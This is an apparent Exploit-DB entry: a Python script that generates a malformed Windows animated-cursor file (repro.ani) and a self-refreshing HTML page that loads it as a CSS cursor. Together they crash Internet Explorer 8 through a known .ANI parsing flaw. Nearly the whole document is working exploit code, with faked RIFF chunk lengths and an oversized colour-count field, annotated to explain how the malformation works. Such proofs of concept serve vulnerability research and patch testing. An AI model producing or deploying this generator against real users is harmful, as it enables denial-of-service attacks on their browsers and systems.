exploit-db-mirror/exploits/windows/dos/33719.py
source: https://www.securityfocus.com/bid/38579/info
Microsoft Windows is prone to a remote denial-of-service vulnerability when processing '.ani' files.
Successful exploits will cause vulnerable applications that use the affected APIs to crash or become unresponsive, denying service to legitimate users. The script below is a generator rather than a live exploit: running it writes a malformed animated-cursor file (repro.ani) plus a loader page (repro.html) that sets that file as the CSS cursor and refreshes itself continuously; the page is then opened in the affected browser to reproduce the crash.
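def Save(name, content):
    """Write *content* to the file *name* as raw bytes.

    The callers build binary RIFF/ANI structures as strings of one-byte
    chr() values, so the file must be written in binary mode: a text-mode
    handle would re-encode any chr() >= 0x80 as multi-byte UTF-8 on
    Python 3 (the RIFF length 0x23A8 alone contains 0xA8) and translate
    newline bytes on Windows, silently corrupting the generated file.
    A str is encoded latin-1 so every chr(0..255) maps to exactly one byte;
    bytes are written unchanged.  The handle is closed on every path.
    """
    if not isinstance(content, bytes):
        content = content.encode('latin-1')
    with open(name, 'wb') as out:
        out.write(content)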
def DWord(*values):
    """Variadic form of DWords(): pack each argument as a little-endian
    32-bit field and return the concatenated str."""
    return DWords(list(values))
def DWords(values):
    """Serialize *values* as consecutive little-endian 32-bit fields.

    Each value is emitted low byte first; bits above 31 are dropped by the
    mask, so over-wide or negative ints wrap instead of raising.  Returns a
    str of one-byte characters, four per value (empty input gives '').
    """
    out = []
    for number in values:
        out.extend(chr((number >> shift) & 0xFF) for shift in (0, 8, 16, 24))
    return ''.join(out)
def Word(*values):
    """Variadic form of Words(): pack each argument as a little-endian
    16-bit field and return the concatenated str."""
    return Words(list(values))
def Words(values):
    """Serialize *values* as consecutive little-endian 16-bit fields.

    Low byte first; bits above 15 are masked off rather than rejected.
    Returns a str of one-byte characters, two per value.
    """
    out = []
    for number in values:
        out.append(chr(number & 0xFF))
        out.append(chr((number >> 8) & 0xFF))
    return ''.join(out)
def Byte(*values):
    """Variadic form of Bytes(): one chr() per argument, concatenated."""
    return Bytes(list(values))
def Bytes(values):
    """Serialize *values* as single bytes via chr(); no masking is applied,
    so out-of-range values raise exactly as chr() does."""
    return ''.join(map(chr, values))
def Chunk(type_id, data, fake_size=None):
    """Build a RIFF chunk: 4-char *type_id*, little-endian DWORD length, payload.

    *data* is anything DataOf() accepts (a str or nested list of str).
    When *fake_size* is given it is written as the length field instead of
    the real payload size, so the header deliberately disagrees with the
    bytes that follow; the payload is neither padded nor truncated to match.
    The .ANI generator below relies on this for its LIST and RIFF headers,
    which appears to be what drives the consuming parser past the end of
    the supplied data.
    """
    payload = DataOf(data)
    length = len(payload) if fake_size is None else fake_size
    return type_id + DWord(length) + payload
def Pad2DWords(string):
    """Pad *string* with NUL bytes up to the next multiple of four.

    RIFF sub-chunk payloads are DWORD aligned; a string whose length is
    already a multiple of four (including '') is returned unchanged.
    """
    remainder = len(string) % 4
    if not remainder:
        return string
    return string + '\0' * (4 - remainder)
def SizeOf(thing):
    """Byte length of *thing* once flattened by DataOf()."""
    flattened = DataOf(thing)
    return len(flattened)
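def DataOf(thing):
    """Flatten a struct description into its serialized str.

    A str is returned as-is; a list is flattened recursively and its
    members concatenated in order (an empty list yields '').  Anything
    else raises AssertionError naming the offending type.

    When a nested member fails, the containing list is printed at every
    nesting level on the way out so the bad member can be located, and
    the original exception is re-raised.  Only Exception subclasses are
    intercepted for that report (not KeyboardInterrupt/SystemExit).
    """
    if isinstance(thing, str):
        return thing
    if isinstance(thing, list):
        parts = []
        try:
            for member in thing:
                parts.append(DataOf(member))
        except Exception:
            # Diagnostic breadcrumb, then propagate unchanged.
            print('Member of %s' % repr(thing))
            raise
        return ''.join(parts)
    raise AssertionError('Struct contains data of unhandled type %s' % type(thing))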
# BITMAPINFOHEADER (http://msdn.microsoft.com/en-us/library/aa930622.aspx),
# kept as a list of per-field strings so index 0 (biSize) can be patched.
# Every field is zero except biSize and biClrUsed.  biClrUsed advertises an
# enormous colour-table entry count; the original author's note is that it
# must stay below 0x3FFFFFF4 "to prevent overflow" -- presumably so the
# count survives the size arithmetic and the oversized allocation path is
# actually reached rather than rejected.  Not verified here.
BITMAPINFOHEADER = (
    [DWord(0)] * 3            # biSize (patched below), biWidth, biHeight
    + [Word(0), Word(0)]      # biPlanes, biBitCount
    + [DWord(0)] * 4          # biCompression, biSizeImage, biXPelsPerMeter, biYPelsPerMeter
    + [DWord(0x3F000000)]     # biClrUsed: bogus colour-table size (< 0x3FFFFFF4, see above)
    + [DWord(0)]              # biClrImportant
)
# biSize = size of this header itself (40 bytes).
BITMAPINFOHEADER[0] = DWord(SizeOf(BITMAPINFOHEADER))
# Colour table: 160 all-zero RGBQUAD entries (640 bytes).  This is far
# fewer entries than biClrUsed (0x3F000000) claims, so a parser that
# trusts the header count will run well past the data actually present.
RGBQUAD = DWords([0] * 160)
# ICONIMAGE (http://msdn.microsoft.com/en-us/library/ms997538.aspx):
# DIB header followed by the colour table.  The icXOR / icAND mask bitmaps
# that normally follow are intentionally omitted.
ICONIMAGE = [BITMAPINFOHEADER, RGBQUAD]
# ICONDIR (http://msdn.microsoft.com/en-us/library/ms997538.aspx): a
# single-image .ICO directory header (6 bytes).  Kept as a list so it can
# be concatenated with the entry and image lists below.
ICONDIR = [
    Word(0),  # idReserved
    Word(1),  # idType: 1 = .ICO, 2 = .CUR
    Word(1),  # idCount: one image follows
]
# ICONDIRENTRY (http://msdn.microsoft.com/en-us/library/ms997538.aspx):
# the one directory entry (16 bytes) describing the embedded ICONIMAGE.
ICONDIRENTRY = [
    Byte(0x20), Byte(0x20),  # bWidth, bHeight: 32x32
    Byte(0x0),               # bColorCount
    Byte(0),                 # bReserved (must be 0)
    Word(0), Word(0),        # wPlanes, wBitCount
    DWord(0),                # dwBytesInRes: patched below
    DWord(0),                # dwImageOffset: patched below
]
# dwBytesInRes is the serialized size of the ICONIMAGE; dwImageOffset
# places the image immediately after the directory header and this entry.
ICONDIRENTRY[-2] = DWord(SizeOf(ICONIMAGE))
ICONDIRENTRY[-1] = DWord(SizeOf(ICONDIR) + SizeOf(ICONDIRENTRY))
# Frame list: one 'icon' chunk holding the .ICO directory plus image,
# wrapped in a LIST of form type 'fram'.  The LIST length is forced to
# 0x231C, well beyond the few hundred bytes actually emitted, so the
# header and the data deliberately disagree.
icon_chunk = Chunk('icon', ICONDIR + ICONDIRENTRY + ICONIMAGE)
fram_data = 'fram' + icon_chunk
list_fram_chunk = Chunk('LIST', fram_data, fake_size=0x231C)
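# ANIHEADER ('anih' chunk) field values.  The struct below is built from
# these names rather than repeating the literals, so the two cannot drift
# apart (previously the constants were defined but never used).
anih_cFrames = 0x01
anih_cSteps = 0x01
anih_cx = 0      # must be 0
anih_cy = 0      # must be 0
anih_cBitCount = 0x00
anih_cPlanes = 0x01
anih_JifRate = 0x0C
anih_flags = 0x01  # AF_ICON: frames are icon/cursor resources
anih_struct = [
    DWord(0),               # cbSize: length of this structure, patched below
    DWord(anih_cFrames),    # cFrames
    DWord(anih_cSteps),     # cSteps
    DWord(anih_cx),         # cx
    DWord(anih_cy),         # cy
    DWord(anih_cBitCount),  # cBitCount
    DWord(anih_cPlanes),    # cPlanes
    DWord(anih_JifRate),    # JifRate
    DWord(anih_flags),      # flags
]
# cbSize = serialized size of the header itself (36 bytes).
anih_struct[0] = DWord(SizeOf(anih_struct))
anih_chunk = Chunk('anih', anih_struct)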
# Loader page: sets the malformed file as the CSS cursor and uses a zero
# second meta refresh so the browser re-parses it continuously.
html = ''.join([
    '<HEAD><META http-equiv="refresh" content="0"/></HEAD>',
    '<BODY style="cursor:url(repro.ani)"></BODY>',
])
# Optional INFO list (name + author), each string NUL-terminated and
# DWORD-padded as RIFF requires.
inam_data = Pad2DWords('MSIE 8.0 .ANI vulnerability\0')
iart_data = Pad2DWords('SkyLined http://skypher.com\0')
inam_chunk = Chunk('INAM', inam_data)
iart_chunk = Chunk('IART', iart_data)
info_chunk = 'INFO' + inam_chunk + iart_chunk
list_info_chunk = Chunk('LIST', info_chunk)
# RIFF/ACON container: INFO list, ANI header, frame list.  The outer RIFF
# length is forced to 0x23A8, again far larger than the payload written.
acon_chunk = 'ACON' + list_info_chunk + anih_chunk + list_fram_chunk
riff_chunk = Chunk('RIFF', acon_chunk, fake_size=0x23A8)
Save('repro.ani', riff_chunk)
Save('repro.html', html)